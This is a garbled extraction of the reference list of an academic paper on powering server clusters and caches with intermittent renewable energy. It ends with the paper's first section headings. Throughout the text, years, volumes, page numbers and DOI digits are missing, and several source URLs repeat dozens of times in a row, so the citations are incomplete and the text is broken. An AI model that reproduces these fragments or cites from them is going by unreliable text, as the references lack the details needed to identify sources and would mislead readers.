http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://www.reuters.com/article/us-google-windpower-idustre j bl http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://perspectives.mvdirona.com/ http://dx.doi.org/ . /peerj-cs. miller r. . microsoft to use solar panels in new data center. data center knowledge. available at http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new- data-center/. moore j, chase j, ranganathan p. . weatherman: automated, online, and predictive thermal mapping and management for data centers. in: proceedings of the international conference on autonomic computing. berkeley: usenix, – . moore j, chase j, ranganathan p, sharma r. . making scheduling “cool”: temperature-aware resource assignment in data centers. in: proceedings of the usenix annual technical conference. berkeley: usenix, – . nah f. . a study on tolerable waiting time: how long are web users willing to wait? behaviour and information technology ( ): – doi . / . ousterhout j, agarwal p, erickson d, kozyrakis c, leverich j, mazieres d, mitra s, narayanan a, parulkar g, rosenblum m, rumble s, stratmann e, stutsman r. . the case for ramclouds: scalable high-performance storage entirely in dram. acm sigops operating systems review ( ): – doi . / . . pelley s, meisner d, zandevakili p, wenisch t, underwood j. . power routing: dynamic power provisioning in the data center. in: proceedings of the conference on architectural support for programming languages and operating systems. new york: acm, – . pinheiro e, bianchini r. . energy conservation techniques for disk array-based servers. in: proceedings of the international conference on supercomputing. piscataway: ieee, – . pinheiro e, bianchini r, carrera ev, heath t. . load balancing and unbalancing for power and performance in cluster-based systems. in: workshop on compilers and operating systems for low power. available at http://www .ic.uff.br/∼julius/stre/pinheiro load.pdf. qureshi a, weber r, balakrishnan h, guttag j, maggs b. . cutting the electric bill for internet-scale systems. in: proceedings of the sigcomm conference. new york: acm, – . ranganathan p, leech p, irwin d, chase j. . ensemble-level power management for dense blade servers. in: proceedings of the international symposium on computer architecture. new york, piscataway: acm/ieee, – . rivoire s, shah m, ranganathan p, kozyrakis c. . joulesort: a balanced energy-efficiency benchmark. in: proceedings of the sigmod conference. new york: acm, – . sen s, rexford j, towsley d. . proxy prefix caching for ximultimedia streams. in: infocom, vol. . piscataway: ieee, – . sharma n, barker s, irwin d, shenoy p. . blink: managing server clusters on intermittent power. in: asplos. new york: acm, – . available at http://lass.cs.umass.edu/papers/pdf/ asplos .pdf. sharma n, krishnappa d, irwin d, zink m, shenoy p. . greencache: augmenting off-the-grid cellular towers with multimedia caches. in: mmsys. new york: acm, – . stewart c, shen k. . some joules are more precious than others: managing renewable energy in the datacenter. in: proceedings of the workshop on power-aware computer systems. new york: acm. stoica i, morris r, karger d, kaashoek f, balakrishnan h. . chord: a scalable peer-to-peer lookup service for internet applications. in: proceedings of the sigcomm conference. new york: acm, – . stoke solutions. . stoke solutions mobile data offload. available at http://www.netmanias. com/ko/?m=view&id=cshare opt&no= . sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://www.datacenterknowledge.com/archives/ / / /microsoft-uses-solar-panels-in-new-data-center/ http://dx.doi.org/ . / http://dx.doi.org/ . / . http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://www .ic.uff.br/~julius/stre/pinheiro load.pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://lass.cs.umass.edu/papers/pdf/asplos .pdf http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://www.netmanias.com/ko/?m=view&id=cshare_opt&no= http://dx.doi.org/ . /peerj-cs. stone b. . google’s next frontier: renewable energy. new york times. available at http://www. nytimes.com/ / / /technology/ google.html? r= (accessed november ). tang x, xu j, chanson s. . web content delivery. new york: springer. terry d, theimer m, petersen k, demers a, spreitzer m, hauser c. . managing update conflicts in bayou, a weakly connected replicated storage system. in: proceedings of the symposium on operating systems principles. new york: acm, – . tolia n, wang z, marwah m, bash c, ranganathan p, zhu x. . delivering energy proportionality with non energy-proportional systems: optimizing the ensemble. in: proceedings of the workshop on power-aware computer systems. new york: acm. us environmental protection agency. . report to congress on server and data center energy efficiency washington, d.c.: epa. verma a, de p, mann v, nayak t, purohit a, dasgupta g, kothari r. . brownmap: enforcing power budget in shared data centers. ibm, technical report ri . armonk: ibm. wolman a, voelker g, sharma n, cardwell n, karlin a, levy h. . on the scale and performance of cooperative web proxy caching. in: proceedings of the symposium on operating systems principles. new york: acm, – . wu k-l, yu ps, wolf jl. . segment-based proxy caching of multimedia streams. in: proceedings of www. new york: acm, – . xu q, huang j, wang z, qian f, gerber a, mao z. . cellular data network infrastructure characterization and implication on mobile content placement. in: sigmetrics. zeng h, ellis c, lebeck a, vahdat a. . ecosystem: managing energy as a first class operating system resource. in: proceedings of the conference on architectural support for programming languages and operating systems. new york: acm, – . zhu q, chen z, tan l, zhou y, keeton k, wilkes j. a. hibernator: helping disk arrays sleep through the winter. in: proceedings of the symposium on operating systems principles. new york: acm, – . zhu q, chen z, tan l, zhou y, keeton k, wilkes j. b. power-aware storage cache management. ieee transactions on computers ( ): – doi . /tc. . . zink m, suh k, yu, kurose j. . characteristics of youtube network traffic at a campus network—measurements, models, and implications. elsevier computer networks ( ): – doi . /j.comnet. . . . sharma et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://www.nytimes.com/ / / /technology/ google.html?_r= http://dx.doi.org/ . /tc. . http://dx.doi.org/ . /j.comnet. . . http://dx.doi.org/ . /peerj-cs. managing server clusters on intermittent power introduction example applications for blink contributions blink: rationale 